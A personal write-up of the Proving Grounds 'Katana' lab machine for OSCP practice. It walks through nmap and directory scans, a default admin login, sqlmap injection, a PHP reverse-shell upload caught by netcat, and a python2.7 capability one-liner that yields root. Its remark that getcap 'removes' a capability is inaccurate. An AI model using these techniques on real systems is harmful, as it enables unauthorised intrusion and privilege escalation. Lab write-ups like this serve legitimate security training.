Offensive Security Proving Grounds (Katana)
Offensive Security offers free lab machines under their “Proving Grounds” library that I find super helpful to prepare for the OSCP. I will be walking you through my experience with an “Easy” level machine called Katana which in my opinion was not that easy especially with its rabbit holes.
Enumeration:
I kicked off my autorecon scanner and started to look through the open ports. I do a process of elimination, starting from top to bottom. I canceled out port 22 for now until I gather some valid SSH credentials or a key to connect to the target machine.
Nmap scan report for 192.168.204.83
Host is up, received user-set (0.082s latency).
Scanned at 2024-01-22 13:02:14 PST for 124s
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDp0J8d7K55SuQO/Uuh8GyKm2xlwCUG3/Jb6+7RlfgbwrCIOzuKXICcMHq4i8z52l/0x0JnN0GUIeNu6Ek/ZGEMK4y+zvAs0R6oPNlScpx0IaLDXTGrjPOcutmx+fy6WDW3/jJGLxwu+55d6pAjzzQR37P1eqH8k9F6fbv6YUFbU+i68x9p5bXCC1m17PDO98Che+q32N6yM26CrQMOl5t1OzO3t1pbvMd3VOQA8Qd+fhz5tpxtRBTSM9ylQj2B+z6XjJnbMPhnO3C1oaYHjjL6KiTfD5YabDqsBf+ZHIdZpM+7fOqKkgHa4bbIWPUXB/OuOJnORvEeRCALOzjcSrxr
| 256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDBsZi0z31ChZ3SWO/gDe+8WyFVPrFX7KgZNp8u/1vlhOSrmdZ32WAZZhTT8bblwgv83FeXPvH7btjDMzTuoYA8=
| 256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICo+dAzFw2csa366udGUkSre2W0qWWGoyWXwKiHk3YQc
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
7080/tcp open ssl/empowerid syn-ack ttl 61 LiteSpeed
|_http-server-header: LiteSpeed
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=1.55.254.232
| Issuer: commonName=katana/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=1.55.254.232
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-11T13:57:36
| Not valid after: 2022-05-11T13:57:36
| MD5: 0443:4a65:9ba1:0b75:ea8d:d1b8:c855:e495
| SHA-1: f89e:f85e:e6b3:6b10:4ebc:5354:80a0:0ae3:7e10:50cc
| -----BEGIN CERTIFICATE-----
| MIIDfTCCAmWgAwIBAgIUAXyRP1qy58OWLRWfP6CNoErg93wwDQYJKoZIhvcNAQEL
| BQAwTjEPMA0GA1UEAwwGa2F0YW5hMREwDwYDVQQKDAh3ZWJhZG1pbjELMAkGA1UE
| BhMCVVMxGzAZBgNVHREMEkROUy4xPTEuNTUuMjU0LjIzMjAeFw0yMDA1MTExMzU3
| MzZaFw0yMjA1MTExMzU3MzZaME4xDzANBgNVBAMMBmthdGFuYTERMA8GA1UECgwI
| d2ViYWRtaW4xCzAJBgNVBAYTAlVTMRswGQYDVR0RDBJETlMuMT0xLjU1LjI1NC4y
| MzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDUrg/knoyr6L8pJhlZ
| bEp2vj/1S/2lEiYzl3CbBtCDcNnSQLB2b7hC5vkzIFT5XOHcboXGSWWZ7g1Mlo/U
| irtoeuFYH0KyqYqKH6cJIUCUuIvsKFvEuSpcLB5oHMH1bNYHl8gk2uxnXDRHfxL1
| mhhV+tDewjGu7TzjWcGapvZmJKCQYJto6X4JagN/Xx7bWZQYKb22E/K/17PPg1Wg
| szg2C8a/sj/GWBiw5HADUx5FnQY0FfljwBBSQr10nGiex+w/NAYK8obUTsvUz1P7
| h2aG1V/9FtXHa6HK7YrApieVVTyBZTf4adj5OvmIT5w43vEBZXgCTUMLcf6JmiGy
| OMmdAgMBAAGjUzBRMB0GA1UdDgQWBBRpfqzDB3dS6IMabVgYjX+nQE8xZzAfBgNV
| HSMEGDAWgBRpfqzDB3dS6IMabVgYjX+nQE8xZzAPBgNVHRMBAf8EBTADAQH/MA0G
| CSqGSIb3DQEBCwUAA4IBAQCGCOYvcHj7XrE0fnuDbc4rdQzSVOCOK31F4aV4pWEh
| a6h/WQX9wQBHcs5XPl9D4JVDFQvtxBPWsmnzqqXm8CbeZ7cfAjzPGd994jFBeom6
| 3gnAXmCFSlRsPuqvKkGhBaSDDtzrWE4eZC0H2g9BJp0f6w4sRJSjCH1wZ30Jvgm+
| 9Hkcw9cG0WxkHEBk3SPB7d9iG6rFLJvZE4dcVbA6jtkhQZDrCAqaH69exWtKSQpV
| oBu7+tHFy/8uv7yRuC4fQY7Nmc0JD5otoax1yOpGN/eSz8zRFh+jl5VzdONtXQCO
| H8o8x5fxVi65kRQYil6UcG3lX56V51h/33dxWIDw+lAE
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to https://192.168.204.83:7080/
8088/tcp open http syn-ack ttl 61 LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8715/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%), Linux 4.4 (87%), Synology DiskStation Manager 5.1 (87%), WatchGuard Fireware 11.8 (87%), Linux 2.6.35 (87%), Linux 4.9 (87%), Linux 3.4 (86%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:Port 21 did not have any exploits I could use for the version of VSFTPD, along with anonymous login being disabled. I moved onto port 80 and started directory busting to find entry points exposed that could lead me to an exploit.
200 GET 23l 73w 655c http://192.168.204.83/
200 GET 96l 272w 3998c http://192.168.204.83/ebook/index.php
200 GET 8l 12w 100c http://192.168.204.83/ebook/bootstrap/css/jumbotron.css
200 GET 81l 207w 3153c http://192.168.204.83/ebook/admin.php
200 GET 64l 183w 2702c http://192.168.204.83/ebook/cart.php
200 GET 94l 221w 3337c http://192.168.204.83/ebook/publisher_list.php
200 GET 137l 295w 5164c http://192.168.204.83/ebook/books.php
200 GET 1l 2w 10c http://192.168.204.83/ebook/book.php
200 GET 91l 616w 72509c http://192.168.204.83/ebook/bootstrap/img/c_14_quick.jpg
200 GET 101l 278w 4155c http://192.168.204.83/ebook/contact.php
200 GET 5l 564w 23357c http://192.168.204.83/ebook/bootstrap/css/bootstrap-theme.min.css
200 GET 7l 430w 36816c http://192.168.204.83/ebook/bootstrap/js/bootstrap.min.js
200 GET 217l 1103w 87317c http://192.168.204.83/ebook/bootstrap/img/pro_asp4.jpg
200 GET 91l 569w 70695c http://192.168.204.83/ebook/bootstrap/img/android_studio.jpg
200 GET 118l 795w 81766c http://192.168.204.83/ebook/bootstrap/img/beauty_js.jpg
200 GET 4l 1305w 84345c http://192.168.204.83/ebook/bootstrap/js/jquery-2.1.4.min.js
200 GET 5l 1446w 122540c http://192.168.204.83/ebook/bootstrap/css/bootstrap.min.css
200 GET 96l 272w 3998c http://192.168.204.83/ebook/
200 GET 23l 73w 655c http://192.168.204.83/index.htmlNavigating the endpoints discovered from directory busting I could already see that this is an online bookstore. The /admin.php was the first page on the list that grabbed my attention…
I tried what every good hacker would try ;) ‘admin’ ‘admin’ as username and password and sure enough I was able to login. Taking notice of the submit query button already has me thinking of SQL injection in correspondence with the site using PHP.
I clicked around a bit and started to take note at some of the URL query string parameters especially the one under the publisher tab.
Opened burpsuite and captured the request and saved it to a file with a .req extension at the end to run SQLmap against.
Note: SQLmap is not allowed on the OSCP since it is considered a autopwn tool. In the real world there are no rules any tools can be used c'mon offsec….
sqlmap -r book.req --current-user
SQLmap identified that the backend was using a MySQL database along with a retrieved user account named ‘ebook’.
I did some further digging with other SQLmap commands to dump the database and it gave me username ‘admin’ and password ‘admin’ which we already have. Going back to my nmap results port 8088 was my next target which preseneted me the same katana page I began directory busting and found the following endpoints:
200 GET 23l 73w 655c http://192.168.204.83:8088/
403 GET 14l 107w 1227c http://192.168.204.83:8088/.htaccess
403 GET 14l 107w 1227c http://192.168.204.83:8088/blocked/
200 GET 114l 310w 5472c http://192.168.204.83:8088/docs/index.html
200 GET 108l 1128w 14854c http://192.168.204.83:8088/docs/Redirect_Context.html
200 GET 103l 647w 8201c http://192.168.204.83:8088/docs/VHWebSocket_Help.html
200 GET 117l 1576w 18329c http://192.168.204.83:8088/docs/AdminGeneral_Help.html
200 GET 98l 358w 6146c http://192.168.204.83:8088/docs/External_LB.html
200 GET 183l 716w 8919c http://192.168.204.83:8088/docs/intro.html
200 GET 114l 1695w 20762c http://192.168.204.83:8088/docs/CGI_Context.html
200 GET 146l 579w 7529c http://192.168.204.83:8088/docs/admin.html
200 GET 131l 1255w 14760c http://192.168.204.83:8088/docs/Templates_Help.html
200 GET 144l 3075w 31651c http://192.168.204.83:8088/docs/Module_Help.html
200 GET 41l 93w 3542c http://192.168.204.83:8088/docs/img/ols_logo.svg
200 GET 124l 1622w 19869c http://192.168.204.83:8088/docs/AdminListeners_SSL_Help.html
200 GET 104l 801w 10713c http://192.168.204.83:8088/docs/External_WS.html
200 GET 123l 2456w 28993c http://192.168.204.83:8088/docs/Static_Context.html
200 GET 179l 1138w 11734c http://192.168.204.83:8088/docs/ExtApp_Help.html
200 GET 152l 4653w 49643c http://192.168.204.83:8088/docs/ServSecurity_Help.html
200 GET 106l 841w 11066c http://192.168.204.83:8088/docs/Listeners_General_Help.html
200 GET 109l 1200w 15882c http://192.168.204.83:8088/docs/LB_Context.html
200 GET 149l 3195w 35815c http://192.168.204.83:8088/docs/VHGeneral_Help.html
200 GET 119l 1664w 19638c http://192.168.204.83:8088/docs/VirtualHosts_Help.html
200 GET 186l 1080w 10023c http://192.168.204.83:8088/docs/config.html
200 GET 818l 6061w 40937c http://192.168.204.83:8088/docs/license.html
200 GET 119l 2175w 24021c http://192.168.204.83:8088/docs/External_LSAPI.html
200 GET 118l 2287w 24785c http://192.168.204.83:8088/docs/VHSecurity_Help.html
200 GET 126l 1723w 19804c http://192.168.204.83:8088/docs/ServerStat_Help.html
200 GET 109l 1184w 15804c http://192.168.204.83:8088/docs/FCGI_Context.html
200 GET 119l 2172w 23947c http://192.168.204.83:8088/docs/External_FCGI.html
200 GET 104l 832w 10987c http://192.168.204.83:8088/docs/External_Servlet.html
200 GET 109l 1206w 15961c http://192.168.204.83:8088/docs/Proxy_Context.html
200 GET 228l 827w 7690c http://192.168.204.83:8088/docs/css/hdoc.css
200 GET 151l 3052w 34966c http://192.168.204.83:8088/docs/ServGeneral_Help.html
200 GET 106l 983w 12895c http://192.168.204.83:8088/docs/External_PL.html
200 GET 121l 1934w 22058c http://192.168.204.83:8088/docs/App_Server_Help.html
200 GET 102l 534w 7886c http://192.168.204.83:8088/docs/AdminListeners_General_Help.html
200 GET 102l 701w 9684c http://192.168.204.83:8088/docs/AdminSecurity_Help.html
200 GET 111l 589w 7502c http://192.168.204.83:8088/docs/Context_Help.html
200 GET 220l 1008w 10438c http://192.168.204.83:8088/docs/install.html
200 GET 106l 1042w 13106c http://192.168.204.83:8088/docs/Rewrite_Help.html
200 GET 109l 1220w 16083c http://192.168.204.83:8088/docs/Servlet_Context.html
200 GET 109l 1506w 17324c http://192.168.204.83:8088/docs/ServLog_Help.html
200 GET 161l 927w 9438c http://192.168.204.83:8088/docs/security.html
200 GET 112l 677w 8837c http://192.168.204.83:8088/docs/ScriptHandler_Help.html
200 GET 102l 317w 5343c http://192.168.204.83:8088/docs/webconsole.html
200 GET 119l 2177w 24019c http://192.168.204.83:8088/docs/External_FCGI_Auth.html
200 GET 109l 1178w 15735c http://192.168.204.83:8088/docs/Module_Context.html
200 GET 109l 1228w 16106c http://192.168.204.83:8088/docs/LSAPI_Context.html
200 GET 128l 1917w 22862c http://192.168.204.83:8088/docs/VHSSL_Help.html
200 GET 129l 2009w 23811c http://192.168.204.83:8088/docs/Listeners_SSL_Help.html
200 GET 124l 2414w 28750c http://192.168.204.83:8088/docs/App_Server_Context.html
200 GET 115l 1877w 22457c http://192.168.204.83:8088/docs/Java_Web_App_Context.html
200 GET 147l 3368w 37963c http://192.168.204.83:8088/docs/ServTuning_Help.html
200 GET 114l 310w 5472c http://192.168.204.83:8088/docs/
200 GET 23l 73w 655c http://192.168.204.83:8088/index.html
200 GET 494l 2889w 50733c http://192.168.204.83:8088/phpinfo.php
401 GET 14l 106w 1242c http://192.168.204.83:8088/protected/
200 GET 35l 202w 1800c http://192.168.204.83:8088/upload.php
200 GET 198l 531w 6480c http://192.168.204.83:8088/upload.htmlIdk about you but the first endpoint that caught my eye was the /upload.html directory…
Exploitation:
I knew it was using PHP on the backend so I needed to upload a php reverse shell.
Kali has one in this default directory that can be copied and altered:
cd /usr/share/webshells/php
sudo cp php-reverse-shell.php ~/Documents/oscp/katanaI opened the file with vim and changed the target IP and port:
I made sure to upload it twice in both browse button sections just in case. Noticing the output message for the file uploads you can see it says “Moved to other web server:” What I did here was visit each webport with the name of my php shell file at the end and got a hit on port 8715.
Note: Pay close attention to the new files name when you upload it because its changing the name of your original file. It adds katana_ in the beginning of file name.
Navigated to my netcat listener in terminal and got a shell!
The local.txt was not in its usual obvious location so I ran linpeas.sh and was able to locate it in the /var/www location.
Getting root was pretty tough for me and had to do some research I saw a capability privesc with +ep permission is set on python2.7. when reading the output of the highlighted linpeas script. I had to use this command to remove the file capability.
getcap -r / 2>/dev/nullWith the above command I got out of the shell. The only thing left is to get the root access. Looked for system capabilities and found empty capability (ep) over SUID is given python2.7 for www-data that means all privilege is assigned to www-data for that program, therefore taking advantage of this permission we can escalate into high privilege from low privilege shell using the command below.
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
